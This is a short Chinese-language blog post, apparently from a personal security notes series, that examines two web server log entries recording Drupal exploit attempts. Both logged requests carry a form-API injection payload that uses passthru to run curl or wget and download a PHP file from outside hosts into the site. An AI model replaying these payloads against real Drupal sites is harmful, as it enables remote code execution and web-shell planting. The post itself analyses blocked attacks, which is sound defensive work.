Wey's note: 從 Web Log 學習系統漏洞 45

2019年7月22日星期一

從 Web Log 學習系統漏洞 45

似乎又是利用 Drupal 的漏洞作攻擊, 不過這次多了一堆看不懂的鬼東西
其中有幾段會連到伊朗的網站下載東西

216.194.173.143 - - [22/Jul/2019:11:17:10 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.phpro.ir/wp-includes/widgets/style.aff' HTTP/1.1" 403 209

216.194.173.143 - - [22/Jul/2019:11:17:16 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://wordpress.com.djcaa.org/style.php%20%7C%20wget%20http://wordpress.com.djcaa.org/style.php HTTP/1.1" 403 209

下載回來的檔案內容如同 log 中帶有 echo 指令後面接的文字所解碼後的鬼東西
(以base64加密的php/gif檔??)

伊朗的網站?

沒有留言:

張貼留言